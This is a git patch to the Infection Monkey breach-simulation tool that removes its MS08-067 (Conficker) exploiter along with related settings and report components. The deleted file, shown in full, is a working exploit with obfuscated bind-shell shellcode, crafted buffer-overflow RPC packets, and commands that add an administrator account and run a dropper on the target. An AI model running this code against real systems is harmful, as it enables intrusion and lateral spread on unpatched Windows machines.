From ff87252a247ea3845f409865d7d3280485353845 Mon Sep 17 00:00:00 2001
From: Ilija Lazoroski <ilija.la@live.com>
Date: Thu, 27 Jan 2022 16:45:55 +0100
Subject: [PATCH] Agent, Island: Remove MS08_67 exploiter

---
 monkey/infection_monkey/config.py             |   3 -
 monkey/infection_monkey/example.conf          |   2 -
 .../infection_monkey/exploit/win_ms08_067.py  | 320 ------------------
 .../definitions/exploiter_classes.py          |  11 -
 .../cc/services/config_schema/internal.py     |  18 -
 .../exploiter_descriptor_enum.py              |   1 -
 .../report-components/SecurityReport.js       |   6 -
 .../security/issues/MS08_067Issue.js          |  24 --
 .../monkey_configs/flat_config.json           |   4 +-
 .../monkey_config_standard.json               |   4 -
 vulture_allowlist.py                          |   2 -
 11 files changed, 1 insertion(+), 394 deletions(-)
 delete mode 100644 monkey/infection_monkey/exploit/win_ms08_067.py
 delete mode 100644 monkey/monkey_island/cc/ui/src/components/report-components/security/issues/MS08_067Issue.js

diff --git a/monkey/infection_monkey/config.py b/monkey/infection_monkey/config.py
index 81c6a9996..fca494e36 100644
--- a/monkey/infection_monkey/config.py
+++ b/monkey/infection_monkey/config.py
@@ -146,9 +146,6 @@ class Configuration(object):
 
     skip_exploit_if_file_exist = False
 
-    ms08_067_exploit_attempts = 5
-    user_to_add = "Monkey_IUSER_SUPPORT"
-
     ###########################
     # ransomware config
     ###########################
diff --git a/monkey/infection_monkey/example.conf b/monkey/infection_monkey/example.conf
index 6c2bc3235..2133be9e3 100644
--- a/monkey/infection_monkey/example.conf
+++ b/monkey/infection_monkey/example.conf
@@ -43,8 +43,6 @@
   ],
   "monkey_log_path_windows": "%temp%\\~df1563.tmp",
   "monkey_log_path_linux": "/tmp/user-1563",
-  "ms08_067_exploit_attempts": 5,
-  "user_to_add": "Monkey_IUSER_SUPPORT",
   "ping_scan_timeout": 10000,
   "smb_download_timeout": 300,
   "smb_service_name": "InfectionMonkey",
diff --git a/monkey/infection_monkey/exploit/win_ms08_067.py b/monkey/infection_monkey/exploit/win_ms08_067.py
deleted file mode 100644
index db6df1212..000000000
--- a/monkey/infection_monkey/exploit/win_ms08_067.py
+++ /dev/null
@@ -1,320 +0,0 @@
-#!/usr/bin/env python
-#############################################################################
-#  MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)
-#  www.hackingspirits.com
-#  www.coffeeandsecurity.com
-#  Email: d3basis.m0hanty @ gmail.com
-#############################################################################
-
-import socket
-import time
-from enum import IntEnum
-from logging import getLogger
-
-from impacket import uuid
-from impacket.dcerpc.v5 import transport
-
-from common.utils.shellcode_obfuscator import clarify
-from infection_monkey.exploit.HostExploiter import HostExploiter
-from infection_monkey.exploit.tools.helpers import get_monkey_depth, get_target_monkey
-from infection_monkey.exploit.tools.smb_tools import SmbTools
-from infection_monkey.model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS
-from infection_monkey.network.smbfinger import SMBFinger
-from infection_monkey.network.tools import check_tcp_port
-from infection_monkey.utils.commands import build_monkey_commandline
-from infection_monkey.utils.random_password_generator import get_random_password
-
-logger = getLogger(__name__)
-
-# Portbind shellcode from metasploit; Binds port to TCP port 4444
-OBFUSCATED_SHELLCODE = (
-    b"4\xf6kPF\xc5\x9b<K\xf8Q\t\xff\xc94\xa9('\xa5%4m\xcd\xa0c\xd9"
-    b"\xd4Y\xca\x80*\xa7S\x98\xb3n+k\xe5\xe3\xffR\x85\xf4k\xb2\xd3"
-    b"\xaa\x10*\x0f\xb5\xdc-W(\x9c\xfe\xfa\xb8\x0eT1\xce\x8a\x9b\x0c"
-    b'\xd4"v\x04\xac~\xec\x04\xb07v\x81\xfd\xed\xd6\x11\x82\xbaN\x1f+'
-    b"\xd6\x9a\xda\xb5yyP\xf2\r\x8ev\x87\xed\x1eU\xa8\xcd\xc3\xba\x9c"
-    b"\x02\xf5\x7f\xb1\xed\xfaN(|\xf7\x1aBPw\xdf!\x86\xd2\x8a\xfe\x1b"
-    b"\x01\xc3\x9d\x802\xeeQ\x13\xff\xde\x95\xe0u\xa5\x19\xc8\xdd"
-    b"\xab[\x86\xdf\xf8\x84\xc6{\xe0W\x9b\xb0[\x05bA\xfc\xde\xa8B"
-    b"\x91b\xfey\x152q4\x15\xa7\x91)\xe8\x8b@\xe8\x8bC\xfc\xa6\x7f"
-    b"\xfc%!_\xef\xe8\x13\xc3\xb4NDA\x0e%\xee\xbdK]L\xa2\x83|\xb3"
-    b"\xa2\xd3\x97]\xd8b\x03\xa7\x0c}\x93\x85\x18\x16\xff\xf1\xfe"
-    b"\xff\xe0E\x0b\xb6\xdb\xdc\xe5\xdb\xc5zr\xf1\r3\xd0\xf5\x80"
-    b"\x89\x86V\x97\x1a\xf2f\x95\x89\xd5\xce\x9a\xee\xa1\xcf\x97"
-    b"\x92\xc5Bx{7\x0cv\xa6\x9d\xaaf\xa4\xb4\x1e\x9ex\x1f\x91N\xe7ZY"
-    b"\xa90\xcd\x94\xb7\x800'\r\x19W\x86\x9d~\x87\x9a\x8e\x8c\x90Gq"
-    b"\x84sB\x07\x10\x8etP\xa5\xfe\x89\x1b\xfe\x0f\xa9&\xab\x19\x1fh"
-    b"\x18b\xd2y\xbd\xd1\xefe\x14p\xe5{ZW\x00T\xf8\x89\x8d\r\xd48\xb1V"
-    b"\xd9\xc3%\x89\x9c\x8e\x11\x00\x96\xe3\xd8\x80\\\x07\xc8d\x7f:\xc3T"
-    b"\xb8\xd1s#\xc0\x04\xcdL\xab\x87\xf0ff\xc2\x02\xe8j\x91\x0eF\x9c[\xb79"
-    b"\x13J\xcdf\xbd\x83\x84\xe2\x08\xe5\xcf\xb6\xda\xda\x07\xaa$\xfe($"
-    b"\x86\x0bO\xcb\x8fj\xf6\x15\xb9B\x82\x0c\x7f\xf5!\xad5j\xc7R\x1c"
-    b"\x95\xe7V^O\xdak\xa0q\x81\xf81\xe3lq{\x0f\xdb\ta\xe7>I,\xab\x1d"
-    b"\xa0\x92Y\x88\x1b$\xa0hK\x03\x0b\x0b\xcf\xe7\xff\x9f\x9d\xb6&J"
-    b"\xdf\x1b\xad\x1b5\xaf\x84\xed\x99\x01'\xa8\x03\x90\x01\xec\x13"
-    b"\xfb\xf9!\x11\x1dc\xd9*\xb4\xd8\x9c\xf1\xb8\xb9\xa1;\x93\xc1\x8dq"
-    b"\xe4\xe1\xe5?%\x1a\x96\x96\xb5\x94\x19\xb5o\x0c\xdb\x89Cq\x14M\xf8"
-    b"\x02\xfb\xe5\x88hL\xc4\xcdd\x90\x8bc\xff\xe3\xb8z#\x174\xbd\x00J"
-    b'\x1c\xc1\xccM\x94\x90tm\x89N"\xd4-'
-)
-
-SHELLCODE = clarify(OBFUSCATED_SHELLCODE).decode()
-
-XP_PACKET = (
-    "\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43"
-    "\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01"
-    "\x00\x00\x5c\x00\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47"
-    "\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48"
-    "\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49"
-    "\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a"
-    "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x90"
-    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
-    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
-    "\x90\x90\x90\x90\x90\x90\x90" + SHELLCODE + "\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00"
-    "\x2e\x00\x5c\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x08\x04\x02"
-    "\x00\xc2\x17\x89\x6f\x41\x41\x41\x41\x07\xf8\x88\x6f\x41\x41\x41\x41\x41\x41\x41\x41"
-    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
-    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x90\x90\x90\x90\x90\x90\x90\x90"
-    "\xeb\x62\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\xe8\x03\x00\x00\x02\x00\x00"
-    "\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00"
-)
-
-# Payload for Windows 2000 target
-PAYLOAD_2000 = "\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00"
-PAYLOAD_2000 += "\x41\x41\x41\x41\x41\x41\x41\x41"
-PAYLOAD_2000 += "\x41\x41\x41\x41\x41\x41\x41\x41"
-PAYLOAD_2000 += "\x41\x41"
-PAYLOAD_2000 += "\x2f\x68\x18\x00\x8b\xc4\x66\x05\x94\x04\x8b\x00\xff\xe0"
-PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43"
-PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43"
-PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43"
-PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43"
-PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43"
-PAYLOAD_2000 += "\xeb\xcc"
-PAYLOAD_2000 += "\x00\x00"
-
-# Payload for Windows 2003[SP2] target
-PAYLOAD_2003 = "\x41\x00\x5c\x00"
-PAYLOAD_2003 += "\x2e\x00\x2e\x00\x5c\x00\x2e\x00"
-PAYLOAD_2003 += "\x2e\x00\x5c\x00\x0a\x32\xbb\x77"
-PAYLOAD_2003 += "\x8b\xc4\x66\x05\x60\x04\x8b\x00"
-PAYLOAD_2003 += "\x50\xff\xd6\xff\xe0\x42\x84\xae"
-PAYLOAD_2003 += "\xbb\x77\xff\xff\xff\xff\x01\x00"
-PAYLOAD_2003 += "\x01\x00\x01\x00\x01\x00\x43\x43"
-PAYLOAD_2003 += "\x43\x43\x37\x48\xbb\x77\xf5\xff"
-PAYLOAD_2003 += "\xff\xff\xd1\x29\xbc\x77\xf4\x75"
-PAYLOAD_2003 += "\xbd\x77\x44\x44\x44\x44\x9e\xf5"
-PAYLOAD_2003 += "\xbb\x77\x54\x13\xbf\x77\x37\xc6"
-PAYLOAD_2003 += "\xba\x77\xf9\x75\xbd\x77\x00\x00"
-
-
-class WindowsVersion(IntEnum):
-    Windows2000 = 1
-    Windows2003_SP2 = 2
-    WindowsXP = 3
-
-
-class SRVSVC_Exploit(object):
-    TELNET_PORT = 4444
-
-    def __init__(self, target_addr, os_version=WindowsVersion.Windows2003_SP2, port=445):
-        self._port = port
-        self._target = target_addr
-        self._payload = PAYLOAD_2000 if WindowsVersion.Windows2000 == os_version else PAYLOAD_2003
-        self.os_version = os_version
-
-    def get_telnet_port(self):
-        """get_telnet_port()
-
-        The port on which the Telnet service will listen.
-        """
-
-        return SRVSVC_Exploit.TELNET_PORT
-
-    def start(self):
-        """start() -> socket
-
-        Exploit the target machine and return a socket connected to it's
-        listening Telnet service.
-        """
-
-        target_rpc_name = "ncacn_np:%s[\\pipe\\browser]" % self._target
-
-        logger.debug("Initiating exploit connection (%s)", target_rpc_name)
-        self._trans = transport.DCERPCTransportFactory(target_rpc_name)
-        self._trans.connect()
-
-        logger.debug("Connected to %s", target_rpc_name)
-
-        self._dce = self._trans.DCERPC_class(self._trans)
-        self._dce.bind(uuid.uuidtup_to_bin(("4b324fc8-1670-01d3-1278-5a47bf6ee188", "3.0")))
-
-        dce_packet = self._build_dce_packet()
-        self._dce.call(0x1F, dce_packet)  # 0x1f (or 31)- NetPathCanonicalize Operation
-
-        logger.debug("Exploit sent to %s successfully...", self._target)
-        logger.debug("Target machine should be listening over port %d now", self.get_telnet_port())
-
-        sock = socket.socket()
-        sock.connect((self._target, self.get_telnet_port()))
-        return sock
-
-    def _build_dce_packet(self):
-        if self.os_version == WindowsVersion.WindowsXP:
-            return XP_PACKET
-        # Constructing Malicious Packet
-        dce_packet = "\x01\x00\x00\x00"
-        dce_packet += "\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00"
-        dce_packet += SHELLCODE
-        dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
-        dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
-        dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
-        dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
-        dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
-        dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
-        dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
-        dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
-        dce_packet += "\x00\x00\x00\x00"
-        dce_packet += "\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00"
-        dce_packet += self._payload
-        dce_packet += "\x00\x00\x00\x00"
-        dce_packet += "\x02\x00\x00\x00\x02\x00\x00\x00"
-        dce_packet += "\x00\x00\x00\x00\x02\x00\x00\x00"
-        dce_packet += "\x5c\x00\x00\x00\x01\x00\x00\x00"
-        dce_packet += "\x01\x00\x00\x00"
-
-        return dce_packet
-
-
-class Ms08_067_Exploiter(HostExploiter):
-    _TARGET_OS_TYPE = ["windows"]
-    _EXPLOITED_SERVICE = "Microsoft Server Service"
-    _windows_versions = {
-        "Windows Server 2003 3790 Service Pack 2": WindowsVersion.Windows2003_SP2,
-        "Windows Server 2003 R2 3790 Service Pack 2": WindowsVersion.Windows2003_SP2,
-        "Windows 5.1": WindowsVersion.WindowsXP,
-    }
-
-    def __init__(self, host):
-        super(Ms08_067_Exploiter, self).__init__(host)
-
-    def is_os_supported(self):
-        if self.host.os.get("type") in self._TARGET_OS_TYPE and self.host.os.get("version") in list(
-            self._windows_versions.keys()
-        ):
-            return True
-
-        if not self.host.os.get("type") or (
-            self.host.os.get("type") in self._TARGET_OS_TYPE and not self.host.os.get("version")
-        ):
-            is_smb_open, _ = check_tcp_port(self.host.ip_addr, 445)
-            if is_smb_open:
-                smb_finger = SMBFinger()
-                if smb_finger.get_host_fingerprint(self.host):
-                    return self.host.os.get("type") in self._TARGET_OS_TYPE and self.host.os.get(
-                        "version"
-                    ) in list(self._windows_versions.keys())
-        return False
-
-    def _exploit_host(self):
-        src_path = get_target_monkey(self.host)
-
-        if not src_path:
-            logger.info("Can't find suitable monkey executable for host %r", self.host)
-            return False
-
-        os_version = self._windows_versions.get(
-            self.host.os.get("version"), WindowsVersion.Windows2003_SP2
-        )
-
-        exploited = False
-        random_password = get_random_password()
-        for _ in range(self._config.ms08_067_exploit_attempts):
-            exploit = SRVSVC_Exploit(target_addr=self.host.ip_addr, os_version=os_version)
-
-            try:
-                sock = exploit.start()
-
-                sock.send(
-                    "cmd /c (net user {} {} /add) &&"
-                    " (net localgroup administrators {} /add)\r\n".format(
-                        self._config.user_to_add,
-                        random_password,
-                        self._config.user_to_add,
-                    ).encode()
-                )
-                time.sleep(2)
-                sock.recv(1000)
-
-                logger.debug("Exploited into %r using MS08-067", self.host)
-                exploited = True
-                break
-            except Exception as exc:
-                logger.debug("Error exploiting victim %r: (%s)", self.host, exc)
-                continue
-
-        if not exploited:
-            logger.debug("Exploiter MS08-067 is giving up...")
-            return False
-
-        # copy the file remotely using SMB
-        remote_full_path = SmbTools.copy_file(
-            self.host,
-            src_path,
-            self._config.dropper_target_path_win_32,
-            self._config.user_to_add,
-            random_password,
-        )
-
-        if not remote_full_path:
-            # try other passwords for administrator
-            for password in self._config.exploit_password_list:
-                remote_full_path = SmbTools.copy_file(
-                    self.host,
-                    src_path,
-                    self._config.dropper_target_path_win_32,
-                    "Administrator",
-                    password,
-                )
-                if remote_full_path:
-                    break
-
-            if not remote_full_path:
-                return True
-
-        # execute the remote dropper in case the path isn't final
-        if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
-            cmdline = DROPPER_CMDLINE_WINDOWS % {
-                "dropper_path": remote_full_path
-            } + build_monkey_commandline(
-                self.host,
-                get_monkey_depth() - 1,
-                self._config.dropper_target_path_win_32,
-            )
-        else:
-            cmdline = MONKEY_CMDLINE_WINDOWS % {
-                "monkey_path": remote_full_path
-            } + build_monkey_commandline(self.host, get_monkey_depth() - 1)
-
-        try:
-            sock.send(("start %s\r\n" % (cmdline,)).encode())
-            sock.send(("net user %s /delete\r\n" % (self._config.user_to_add,)).encode())
-        except Exception as exc:
-            logger.debug(
-                "Error in post-debug phase while exploiting victim %r: (%s)", self.host, exc
-            )
-            return True
-        finally:
-            try:
-                sock.close()
-            except socket.error:
-                pass
-
-        logger.info(
-            "Executed monkey '%s' on remote victim %r (cmdline=%r)",
-            remote_full_path,
-            self.host,
-            cmdline,
-        )
-
-        return True
diff --git a/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py b/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py
index 56f81256b..f21bc942d 100644
--- a/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py
+++ b/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py
@@ -42,17 +42,6 @@ EXPLOITER_CLASSES = {
             "link": "https://www.guardicore.com/infectionmonkey/docs/reference"
             "/exploiters/mssql/",
         },
-        {
-            "type": "string",
-            "enum": ["Ms08_067_Exploiter"],
-            "title": "MS08-067 Exploiter",
-            "safe": False,
-            "info": "Unsafe exploiter, that might cause system crash due to the use of buffer "
-            "overflow. "
-            "Uses MS08-067 vulnerability.",
-            "link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/ms08"
-            "-067/",
-        },
         {
             "type": "string",
             "enum": ["SSHExploiter"],
diff --git a/monkey/monkey_island/cc/services/config_schema/internal.py b/monkey/monkey_island/cc/services/config_schema/internal.py
index ff5ad4e72..94a1f3603 100644
--- a/monkey/monkey_island/cc/services/config_schema/internal.py
+++ b/monkey/monkey_island/cc/services/config_schema/internal.py
@@ -266,24 +266,6 @@ INTERNAL = {
                         }
                     },
                 },
-                "ms08_067": {
-                    "title": "MS08_067",
-                    "type": "object",
-                    "properties": {
-                        "ms08_067_exploit_attempts": {
-                            "title": "MS08_067 exploit attempts",
-                            "type": "integer",
-                            "default": 5,
-                            "description": "Number of attempts to exploit using MS08_067",
-                        },
-                        "user_to_add": {
-                            "title": "Remote user",
-                            "type": "string",
-                            "default": "Monkey_IUSER_SUPPORT",
-                            "description": "Username to add on successful exploit",
-                        },
-                    },
-                },
             },
             "smb_service": {
                 "title": "SMB service",
diff --git a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py
index 7d7921b8b..1555b4b61 100644
--- a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py
+++ b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py
@@ -34,7 +34,6 @@ class ExploiterDescriptorEnum(Enum):
     ELASTIC = ExploiterDescriptor(
         "ElasticGroovyExploiter", "Elastic Groovy Exploiter", ExploitProcessor
     )
-    MS08_067 = ExploiterDescriptor("Ms08_067_Exploiter", "Conficker Exploiter", ExploitProcessor)
     SHELLSHOCK = ExploiterDescriptor(
         "ShellShockExploiter", "ShellShock Exploiter", ShellShockExploitProcessor
     )
diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js b/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js
index 63d1d7e6f..270db721a 100644
--- a/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js
+++ b/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js
@@ -30,7 +30,6 @@ import {sshKeysReport, shhIssueReport, sshIssueOverview} from './security/issues
 import {elasticIssueOverview, elasticIssueReport} from './security/issues/ElasticIssue';
 import {shellShockIssueOverview, shellShockIssueReport} from './security/issues/ShellShockIssue';
 import {log4shellIssueOverview, log4shellIssueReport} from './security/issues/Log4ShellIssue';
-import {ms08_067IssueOverview, ms08_067IssueReport} from './security/issues/MS08_067Issue';
 import {
   crossSegmentIssueOverview,
   crossSegmentIssueReport,
@@ -136,11 +135,6 @@ class ReportPageComponent extends AuthComponent {
         [this.issueContentTypes.REPORT]: powershellIssueReport,
         [this.issueContentTypes.TYPE]: this.issueTypes.DANGER
       },
-      'Ms08_067_Exploiter': {
-        [this.issueContentTypes.OVERVIEW]: ms08_067IssueOverview,
-        [this.issueContentTypes.REPORT]: ms08_067IssueReport,
-        [this.issueContentTypes.TYPE]: this.issueTypes.DANGER
-      },
       'ZerologonExploiter': {
         [this.issueContentTypes.OVERVIEW]: zerologonIssueOverview,
         [this.issueContentTypes.REPORT]: zerologonIssueReport,
diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/MS08_067Issue.js b/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/MS08_067Issue.js
deleted file mode 100644
index 2a831a093..000000000
--- a/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/MS08_067Issue.js
+++ /dev/null
@@ -1,24 +0,0 @@
-import React from 'react';
-import CollapsibleWellComponent from '../CollapsibleWell';
-
-export function ms08_067IssueOverview() {
-  return (<li>Machines are vulnerable to ‘Conficker’ (<a
-                      href="https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/ms08-067"
-  >MS08-067</a>). </li>)
-}
-
-export function ms08_067IssueReport(issue) {
-  return (
-      <>
-        Install the latest Windows updates or upgrade to a newer operating system.
-        <CollapsibleWellComponent>
-          The machine <span className="badge badge-primary">{issue.machine}</span> (<span
-          className="badge badge-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to a <span
-          className="badge badge-danger">Conficker</span> attack.
-          <br/>
-          The attack was made possible because the target machine used an outdated and unpatched operating system
-          vulnerable to Conficker.
-        </CollapsibleWellComponent>
-      </>
-    );
-}
diff --git a/monkey/tests/data_for_tests/monkey_configs/flat_config.json b/monkey/tests/data_for_tests/monkey_configs/flat_config.json
index 2840cbbb5..4f6704d9b 100644
--- a/monkey/tests/data_for_tests/monkey_configs/flat_config.json
+++ b/monkey/tests/data_for_tests/monkey_configs/flat_config.json
@@ -76,7 +76,6 @@
     "max_depth": null,
     "monkey_log_path_linux": "/tmp/user-1563",
     "monkey_log_path_windows": "%temp%\\~df1563.tmp",
-    "ms08_067_exploit_attempts": 5,
     "ping_scan_timeout": 1000,
     "post_breach_actions": [
         "CommunicateAsBackdoorUser",
@@ -120,6 +119,5 @@
         3306,
         7001,
         8088
-    ],
-    "user_to_add": "Monkey_IUSER_SUPPORT"
+    ]
 }
diff --git a/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json b/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json
index fc9f2bb05..b810d4356 100644
--- a/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json
+++ b/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json
@@ -121,10 +121,6 @@
         "exploit_ssh_keys": [],
         "general": {
           "skip_exploit_if_file_exist": false
-        },
-        "ms08_067": {
-          "ms08_067_exploit_attempts": 5,
-          "user_to_add": "Monkey_IUSER_SUPPORT"
         }
       },
       "testing": {
diff --git a/vulture_allowlist.py b/vulture_allowlist.py
index 926863a6d..2f7598379 100644
--- a/vulture_allowlist.py
+++ b/vulture_allowlist.py
@@ -59,7 +59,6 @@ password_restored  # unused variable (monkey/monkey_island/cc/services/reporting
 SSH  # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:30)
 SAMBACRY  # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:31)
 ELASTIC  # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:32)
-MS08_067  # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:35)
 SHELLSHOCK  # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:36)
 STRUTS2  # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:39)
 WEBLOGIC  # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:40)
@@ -129,7 +128,6 @@ ts  # unused variable (monkey/infection_monkey/exploit/zerologon_utils/options.p
 opnum  # unused variable (monkey/infection_monkey/exploit/zerologon.py:466)
 structure  # unused variable (monkey/infection_monkey/exploit/zerologon.py:467)
 structure  # unused variable (monkey/infection_monkey/exploit/zerologon.py:478)
-_._port  # unused attribute (monkey/infection_monkey/exploit/win_ms08_067.py:123)
 oid_set  # unused variable (monkey/infection_monkey/exploit/tools/wmi_tools.py:96)
 export_monkey_telems  # unused variable (monkey/infection_monkey/config.py:282)
 NoInternetError  # unused class (monkey/common/utils/exceptions.py:33)